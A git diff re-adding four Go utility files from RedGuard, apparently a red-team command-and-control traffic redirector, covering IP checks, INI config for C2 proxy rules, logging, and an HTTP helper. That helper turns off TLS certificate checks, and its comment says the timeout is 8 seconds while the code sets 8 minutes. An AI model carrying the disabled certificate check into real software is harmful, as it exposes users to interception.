regexp.MatchString("^(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)\\.(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)\\.(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)\\.(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)$", ip); !m { - return false - } - return true -} - -func FileExists(path string) (bool, error) { - _, err := os.Stat(path) - if err == nil { - return true, nil - } - if os.IsNotExist(err) { - return false, nil - } - return false, err -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: convert.go + * @Time: 2022/5/9 12:24 + **/ + +package lib + +import ( + "crypto/md5" + "encoding/hex" + "encoding/json" + "os" + "regexp" +) + +// JsonToMap Convert json string to map +func JsonToMap(jsonStr string) map[string]string { + mapper := make(map[string]string) + err := json.Unmarshal([]byte(jsonStr), &mapper) + if err != nil { + return nil + } + return mapper +} + +// ConvertIP Find IP Address +func ConvertIP(ip string) string { + reg, _ := regexp.Compile(`\d+\.\d+\.\d+\.\d+`) + return string(reg.Find([]byte(ip))) +} + +// EncodeMD5 Convert string to md5 +func EncodeMD5(s string) string { + hash := md5.New() + hash.Write([]byte(s)) + md5Str := hex.EncodeToString(hash.Sum(nil)) + return md5Str +} + +// CheckIP Check whether the entered IP address is valid +func CheckIP(ip string) bool { + if m, _ := regexp.MatchString("^(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)\\.(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)\\.(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)\\.(25[0-5]|2[0-4]\\d|[0-1]\\d{2}|[1-9]?\\d)$", ip); !m { + return false + } + return true +} + +func FileExists(path string) (bool, error) { + _, err := os.Stat(path) + if err == nil { + return true, nil + } + if os.IsNotExist(err) { + return false, nil + } + return false, err +} diff --git a/lib/handle_config.go b/lib/handle_config.go index fc51326..c5e1607 100644 --- a/lib/handle_config.go +++ b/lib/handle_config.go @@ -1,97 +1,97 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: handle_config.go - * @Time: 2022/5/5 9:15 - **/ - -package lib - -import ( - "RedGuard/config" - "RedGuard/core/parameter" - "fmt" - "io/ioutil" - "os" - "os/user" - - "github.com/go-ini/ini" -) - -var ( - _ConfigFilename string // Config Filename - logger = Logger() // logger output model - //localPath, _ = os.Getwd() // Current project root directory -) - -func InitConfig() *ini.File { - // Check whether the configuration file has been created - cfg, err := ini.Load(_ConfigFilename) // Loading a Configuration File - // Check whether loading failed - if err != nil { - logger.Errorf("Fail to read file: %v", err) - os.Exit(0) - } - // return *ini.File object - return cfg -} - -func CreateConfig(C2Server string, ConfigPath string) (int, bool) { - currentUser, _ := user.Current() // Current operating system user directory - _ConfigFilename = fmt.Sprintf("%s/.RedGuard_%s.ini", currentUser.HomeDir, C2Server) - // Verify that the configuration file is customized - if file, _ := ioutil.ReadFile(ConfigPath); len(file) != 0 { - _ConfigFilename = ConfigPath // Configuration file using a custom path - } - // Check whether the current operating system user directory configuration file exists - if _, err := os.Stat(_ConfigFilename); err == nil || os.IsExist(err) { - return 0, true - } - destination, err := os.Create(_ConfigFilename) // Operating system user directory location - _, _ = destination.WriteString(config.RedGuardConfig) - defer func(destination *os.File) { - _ = destination.Close() // close destination File - }(destination) - logger.Notice("RedGuard initialization is complete!") - logger.Noticef("RedGuard config path is: %s", _ConfigFilename) - return 1, err == nil -} - -// WriteConfig Write data to config file -func WriteConfig(section, key, value string, cfg *ini.File) bool { - cfg.Section(section).Key(key).SetValue(value) - if err := cfg.SaveTo(_ConfigFilename); err != nil { - return false - } - return true -} - -// ReadConfig Return Field data specified in the configuration file -func ReadConfig(section, key string, cfg *ini.File) string { - return cfg.Section(section).Key(key).String() -} - -// UpdateConfig Modify the content of the configuration file -// Oh, my God, this is not elegant! -func UpdateConfig(cert *parameter.Cert, proxy *parameter.Proxy) { - var ( - _certList = map[string]string{ - "Locality": cert.Locality, "Country": cert.Country, "Organization": cert.Organization, - "CommonName": cert.CommonName, "DNSName": cert.DNSNameTo, "HasCert": cert.HasCert, - } - _proxyLIst = map[string]string{ - "Port_HTTP": proxy.HTTPort, "Port_HTTPS": proxy.HTTPSPort, "Redirect": proxy.Redirect, - "AllowIP": proxy.AllowIP, "AllowTime": proxy.AllowTime, "AllowLocation": proxy.AllowLocation, - "DropAction": proxy.DropAction, "HostTarget": proxy.HostTarget, "MalleableFile": proxy.MalleableFile, - } - cfg = InitConfig() - ) - // re cert Write Config - for k, v := range _certList { - WriteConfig("cert", k, v, cfg) - } - // re proxy Write Config - for k, v := range _proxyLIst { - WriteConfig("proxy", k, v, cfg) - } -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: handle_config.go + * @Time: 2022/5/5 9:15 + **/ + +package lib + +import ( + "RedGuard/config" + "RedGuard/core/parameter" + "fmt" + "io/ioutil" + "os" + "os/user" + + "github.com/go-ini/ini" +) + +var ( + _ConfigFilename string // Config Filename + logger = Logger() // logger output model + //localPath, _ = os.Getwd() // Current project root directory +) + +func InitConfig() *ini.File { + // Check whether the configuration file has been created + cfg, err := ini.Load(_ConfigFilename) // Loading a Configuration File + // Check whether loading failed + if err != nil { + logger.Errorf("Fail to read file: %v", err) + os.Exit(0) + } + // return *ini.File object + return cfg +} + +func CreateConfig(C2Server string, ConfigPath string) (int, bool) { + currentUser, _ := user.Current() // Current operating system user directory + _ConfigFilename = fmt.Sprintf("%s/.RedGuard_%s.ini", currentUser.HomeDir, C2Server) + // Verify that the configuration file is customized + if file, _ := ioutil.ReadFile(ConfigPath); len(file) != 0 { + _ConfigFilename = ConfigPath // Configuration file using a custom path + } + // Check whether the current operating system user directory configuration file exists + if _, err := os.Stat(_ConfigFilename); err == nil || os.IsExist(err) { + return 0, true + } + destination, err := os.Create(_ConfigFilename) // Operating system user directory location + _, _ = destination.WriteString(config.RedGuardConfig) + defer func(destination *os.File) { + _ = destination.Close() // close destination File + }(destination) + logger.Notice("RedGuard initialization is complete!") + logger.Noticef("RedGuard config path is: %s", _ConfigFilename) + return 1, err == nil +} + +// WriteConfig Write data to config file +func WriteConfig(section, key, value string, cfg *ini.File) bool { + cfg.Section(section).Key(key).SetValue(value) + if err := cfg.SaveTo(_ConfigFilename); err != nil { + return false + } + return true +} + +// ReadConfig Return Field data specified in the configuration file +func ReadConfig(section, key string, cfg *ini.File) string { + return cfg.Section(section).Key(key).String() +} + +// UpdateConfig Modify the content of the configuration file +// Oh, my God, this is not elegant! +func UpdateConfig(cert *parameter.Cert, proxy *parameter.Proxy) { + var ( + _certList = map[string]string{ + "Locality": cert.Locality, "Country": cert.Country, "Organization": cert.Organization, + "CommonName": cert.CommonName, "DNSName": cert.DNSNameTo, "HasCert": cert.HasCert, + } + _proxyLIst = map[string]string{ + "Port_HTTP": proxy.HTTPort, "Port_HTTPS": proxy.HTTPSPort, "Redirect": proxy.Redirect, + "AllowIP": proxy.AllowIP, "AllowTime": proxy.AllowTime, "AllowLocation": proxy.AllowLocation, + "DropAction": proxy.DropAction, "HostTarget": proxy.HostTarget, "MalleableFile": proxy.MalleableFile, + } + cfg = InitConfig() + ) + // re cert Write Config + for k, v := range _certList { + WriteConfig("cert", k, v, cfg) + } + // re proxy Write Config + for k, v := range _proxyLIst { + WriteConfig("proxy", k, v, cfg) + } +} diff --git a/lib/logger.go b/lib/logger.go index b8c3d0d..46997aa 100644 --- a/lib/logger.go +++ b/lib/logger.go @@ -1,32 +1,32 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: logger.go - * @Time: 2022/5/5 9:09 - **/ - -package lib - -import "github.com/phachon/go-logger" - -func Logger() *go_logger.Logger { - logger := go_logger.NewLogger() - if err := logger.Detach("console"); err != nil { - return nil - } - console := &go_logger.ConsoleConfig{ - Color: true, // Whether the text shows color - Format: "[%timestamp_format%] %body%", - } - fileConfig := &go_logger.FileConfig{ - Filename: "./RedGuard.log", - MaxSize: 1024 * 1024, // Maximum file size (KB). The default value is 0 - MaxLine: 50000, - MaxBak: 1, - DateSlice: "d", - Format: "[%timestamp_format%] [%function%] %body%", - } - logger.Attach("file", go_logger.LOGGER_LEVEL_DEBUG, fileConfig) - logger.Attach("console", go_logger.LOGGER_LEVEL_DEBUG, console) - return logger -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: logger.go + * @Time: 2022/5/5 9:09 + **/ + +package lib + +import "github.com/phachon/go-logger" + +func Logger() *go_logger.Logger { + logger := go_logger.NewLogger() + if err := logger.Detach("console"); err != nil { + return nil + } + console := &go_logger.ConsoleConfig{ + Color: true, // Whether the text shows color + Format: "[%timestamp_format%] %body%", + } + fileConfig := &go_logger.FileConfig{ + Filename: "./RedGuard.log", + MaxSize: 1024 * 1024, // Maximum file size (KB). The default value is 0 + MaxLine: 50000, + MaxBak: 1, + DateSlice: "d", + Format: "[%timestamp_format%] [%function%] %body%", + } + logger.Attach("file", go_logger.LOGGER_LEVEL_DEBUG, fileConfig) + logger.Attach("console", go_logger.LOGGER_LEVEL_DEBUG, console) + return logger +} diff --git a/lib/request.go b/lib/request.go index 35739fe..c1bde30 100644 --- a/lib/request.go +++ b/lib/request.go @@ -1,49 +1,49 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: request.go - * @Time: 2022/5/5 9:08 - **/ - -package lib - -import ( - "crypto/tls" - "net/http" - "strings" - "time" - - "github.com/axgle/mahonia" - "github.com/go-resty/resty/v2" -) - -const USERAGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" - -// HTTPRequest HTTP request and gets the response status and the body -// @param url string The URL to request -// @return respBody string HTTP response Body -// @return status int HTTP response status -func HTTPRequest(url string) (status int, respBody string) { - client := resty.New() - // The HTTP request timed out for 8 seconds - client.SetTimeout(8 * time.Minute) - client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) // disable security check (https) - // HTTP request header information - client.Header = http.Header{ - "User-Agent": {USERAGENT}, - "Accept": {"text/html, application/xhtml+xml, image/jxr, */*"}, - "RedGuard": {"True"}, - "charset": {"UTF-8"}, - } - resp, err := client.R(). - EnableTrace(). // the Resty client trace for the requests fired - Get(url) // HTTP GET requests - // Check whether the HTTP URL request succeeds - if err != nil { - return - } - // return HTTP response StatusCode - return resp.StatusCode(), - // return response body data - strings.TrimSpace(mahonia.NewDecoder("gbk").ConvertString(string(resp.Body()))) -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: request.go + * @Time: 2022/5/5 9:08 + **/ + +package lib + +import ( + "crypto/tls" + "net/http" + "strings" + "time" + + "github.com/axgle/mahonia" + "github.com/go-resty/resty/v2" +) + +const USERAGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" + +// HTTPRequest HTTP request and gets the response status and the body +// @param url string The URL to request +// @return respBody string HTTP response Body +// @return status int HTTP response status +func HTTPRequest(url string) (status int, respBody string) { + client := resty.New() + // The HTTP request timed out for 8 seconds + client.SetTimeout(8 * time.Minute) + client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) // disable security check (https) + // HTTP request header information + client.Header = http.Header{ + "User-Agent": {USERAGENT}, + "Accept": {"text/html, application/xhtml+xml, image/jxr, */*"}, + "RedGuard": {"True"}, + "charset": {"UTF-8"}, + } + resp, err := client.R(). + EnableTrace(). // the Resty client trace for the requests fired + Get(url) // HTTP GET requests + // Check whether the HTTP URL request succeeds + if err != nil { + return + } + // return HTTP response StatusCode + return resp.StatusCode(), + // return response body data + strings.TrimSpace(mahonia.NewDecoder("gbk").ConvertString(string(resp.Body()))) +}